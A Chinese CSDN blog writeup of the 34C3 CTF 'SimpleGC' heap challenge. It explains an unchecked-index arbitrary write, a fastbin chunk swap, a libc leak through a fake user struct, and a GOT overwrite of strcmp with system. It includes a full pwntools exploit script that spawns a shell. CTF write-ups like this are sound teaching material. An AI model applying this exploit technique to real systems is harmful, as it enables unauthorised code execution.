34c3ctf SimpleGC writeup

最新推荐文章于 2019-11-23 10:31:53 发布
最新推荐文章于 2019-11-23 10:31:53 发布
阅读量345 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79301363
版权

看到这题,堆,难度标着是easy…..然而做起来真的感觉GG

其实这道题的漏洞也挺明显的,edit_group那里没有检查下标,下标可以到group那里,然后就可以实现任意地址写

但是想起来还是很麻烦的,想了半天才想到一种最快捷的办法

先create_user
然后group的name最后8个字节为要任意写的地址

然后delete这个user

这个时候程序按顺序干了几件事
1. 将group的计数减一
2. free掉user
3. 将这个user置为0
4. 子线程检测到group计数为0,将group free掉

此时fastbin的链表如下
user->group_name->group

当再创建一个user的时候,顺带会创建一个group,这个group的group name会是以前group的地址,group会是以前group name的地址,就是换了一下

所以我们这个时候edit group,然后下标输96,就能edit到我们想要的地址

但是这个时候还要leak出libc的地址,这个就比较麻烦了

本来想的是利用user的name free掉之后再创建,得到fastbin的指向main_arena的地址,但是这里比较坑,delete user的时候不会free name…..

所以我选择在bss段user那里构造一个fake user

但是一次只能写0x18个字节

所以可以分两次构造,不过其实这里一次构造也可以

然后可以利用fake_user来打印出got表里面函数的地址

然后再edit_group,将strcmp改成system,然后show group ,输入/bin/sh就能get shell

payload如下

from pwn import *

debug=1
if debug:
    p=process('./sgc')
    context.log_level='debug'
    #gdb.attach(proc.pidof(p)[0])
    e=ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
else:
    p=remote('xx')
    e=ELF('./libc.so')

def ru(x):
    p.recvuntil(x)
def se(x):
    p.sendline(x)

def add_user(name,group,age):
    ru('Action: ')
    se('0')
    ru('Please enter the user\'s name:')
    se(name)
    ru('Please enter the user\'s group:')
    se(group)
    ru('Please enter your age:')
    se(str(age))

def edit_group(index,change,group):
    ru('Action: ')
    se('3')
    ru('Enter index: ')
    se(str(index))
    ru('Would you like ')
    if(change):
        se('y')
    else:
        se('n')
    ru('Enter new group name: ')
    se(group)

def show_user(index):
    ru('Action: ')
    se('2')
    ru('Enter index: ')
    se(str(index))
    p.recvuntil('Name: ')
    data=p.recv(6)
    return data

def delete_user(index):
    ru('Action: ')
    se('4')
    ru('Enter index: ')
    se(str(index))
sleep(1)   
g1_name='a'*0x10+p64(0x602118)
g1_name=g1_name[:-2]

g2_name='a'*0x10+p64(0x602100)
g2_name=g2_name[:-2]

add_user('x'*0x18,g1_name,1)
delete_user(0)
add_user('x'*0x18,g2_name,1)

fake_user=p64(0)+p64(0x602018)+p64(0x602068)[:-2]
edit_group(96,True,fake_user)

sleep(0.1)
delete_user(0)
add_user('x'*0x18,g2_name,1)

fake_pointer=p64(0x602118)*3
fake_pointer=fake_pointer[:-2]

edit_group(96,True,fake_pointer)

free=u64(show_user(6)+'\x00\x00')
base=free-e.symbols['__libc_free']
print(hex(free))
print(hex(base))
system=base+e.symbols['system']

edit_group(6,True,p64(system))

se('1')
sleep(0.1)
se('/bin/sh')


p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
34C3
Sanky0u的博客
09-28 365
JuniorCTF - nohtyp1 题目: We love snakes. Hints: $ cat flag | md5sum 5a76c600c2ca0f179b643a4fcd4bc7ac Writeup: 打开py文件之后有许多下划线值: ____=input;__________________=print;___________=____();_________=map;____...
34C3 ctf writeup
qq_27396789的博客
01-02 1276
又一篇writeup读后感。。什么时候能写自己的writeup。。miscminbashmaxfun Minimal bash - maximal fun! nc 35.198.107.77 1337 Difficulty: medium nc之后出现长这样的bash提示:min-bash>:,输入一些东西出现:+==============================
171228 逆向-34c3ctf(m0rph)
whklhhhh的博客
12-29 851
1625-5 王子昂 总结《2017年12月28日》 【连续第454天总结】 A. 34c3ctf - m0rph B. 国际的CTF难度真是感人……OTZ虽然确实很好玩就是了64位elf文件,拖入IDA打开,找到main函数 哎哟,这么清晰的结构~真是Easy啊~太年轻了 仔细看看,len要求为23,再往下….v6是函数?qword_202020+8*i这里放着啥函数啊 点过去也
EDA资料(GC POWER)
04-02
GC POWER 导出坐标教程,SMT元件焊盘转换,踩点导出过程
谁是卧底-CTF题目writeup
syh_486_007的专栏
08-22 2455
题目  武林中某知名杀手在一次任务中失败,然后逃窜到了人群中,当时那个社会并没有我们现在这么发达,满地都是文盲,而这些文盲甚至连一句完整的英文都说不出来,所以其实只要用心去发现,就会很容易发现这个稍微有些文化的杀手是谁哦~答案wctf{杀手的英文名}   链接: http://pan.baidu.com/s/1bnq6nmR 密码: 988uwriteup1.初步分析  下载文件,初步发现:
elgoog:来自34C3 CTF WCTF 2018的elgoogsearchme挑战
05-02
它在34C3 CTF上被称为“ elgoog2”,但有一个意外的错误。 带回WCTF 2018,作为“ searchme”。 我们有一个易受攻击的内核驱动程序,用于处理文档索引。 它使您可以通过将文档逐步添加到索引中来构建反向索引,...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
自己ctf比赛的writeup.zip
最新发布
10-01
CTF(Capture The Flag)比赛中,Writeup通常是指参赛者对比赛过程、解题思路以及解决方案的详细记录。这个“自己ctf比赛的writeup.zip”文件很可能包含了作者在参与CTF比赛时的全部心得体验,包括但不限于解题...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
ESP32那些事儿(六):功能开发之蓝牙及WiFi功能
热门推荐
荷兰风车
10-31 1万+
蓝牙和WIFI是ESP32的核心功能,蓝牙和wifi的共存也是esp32的独门武功,但时候后续也会发现共存的时候会有很多问题。不管怎样,蓝牙和wifi在esp-idf中有很多的例子,大家都可以参考。本篇只做简单的流程介绍。          1、蓝牙a2dp sink的初始化     蓝⽛牙是⼀一种短距通信系统,其关键特性包括鲁棒性、低功耗、低成本等。蓝⽛系统分为两种不不同的技术:经典蓝牙 (Cl...
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1770
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
34C3 CTF Web urlstorage Writeup
dengzhasong7076的博客
01-04 914
也是一个超高质量的题目,rpo获取网页信息,不过有一个非预期,nginx没有配置好,导致可以读取文件然后拿到flag。 如果对rpo攻击不熟悉的话,可以先看看这 RPO攻击 几个信息点 1、csrf,个人的url地址保存的时候是可以进行csrf的 结合网页加载的css,可导致rpo漏洞. %0a%0d%0a%0a%0d%0a*%7B%7D*{}*{background:red}*{}...
校内CTF比赛WriteUp
PCK
07-03 1195
文章目录 asdasd asdas
HBCTF——WriteUp&&涨姿势(2)
困难是否磨灭你的自信
04-23 1966
WriteUp 巴基斯坦_听音乐 塔吉克_扫一扫 印尼_find_the_key 安哥拉_一步一步 北韩_进过多少次加密 日本_hundouluo 伊朗_爆破 利比亚_密码多简单 越南_真的加密了? 埃塞俄比亚-隐写术 秘鲁_源代码给你又如何
2019火种CTF PWN writeup
qq_43189757的博客
11-23 893
1.lllheap 思路: UAF漏洞,程序限制了chunk的大小为0x80-0x200 之间, 那么无法通过常规的fastbin attack来覆写malloc_hook , 但是可以通过改写global_max_fast 来扩大fastbin 的上限大小, 再往_IO_stdin 附近写入0xf1作为跳板, 伪造fake_chunk从而覆写malloc_hook exp: from pwn i...
2017 火种CTF Writeup
4ct10n
07-06 6117
趁着周日的时间打了个小比赛。。。。
SDUT_CTF_WEB题目writeup
至臻求学,胸怀云月
10-08 4712
平台链接http://sctf.sdutislab.cn/challenges 闲的没事做了做实验室自己搭的平台,把web题目writeup放出来签到题右键查看源代码芝麻开门 输入口令:zhimakaimen 那就输呗 结果发现 zhimakaimen是11位,但是输入框最大允许输入10位 f12改一下前端验证把最后一个n输进去,flag就出来了 层层递进看源代码之后,iframe奇怪!
强网杯ctf pwn&re writeup (部分)
这里没人
06-04 7100
打了2天的强网杯,虽然一度冲进了前10。可惜最后的时候还是掉出了20名。最后只能无奈打出GG。其中的原因有很多,也不想多说了。 逆向溢出题3连发。我就只会那么多了Orz 先来一道re200 kergen 发送24位的字符串,主要是400B56处的检验函数。检验方法是这样的先是发送字符的第1 10 7 11 2 13 16 17位,中间插入43917202。然后MD5,然后转化成32位字符串形
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值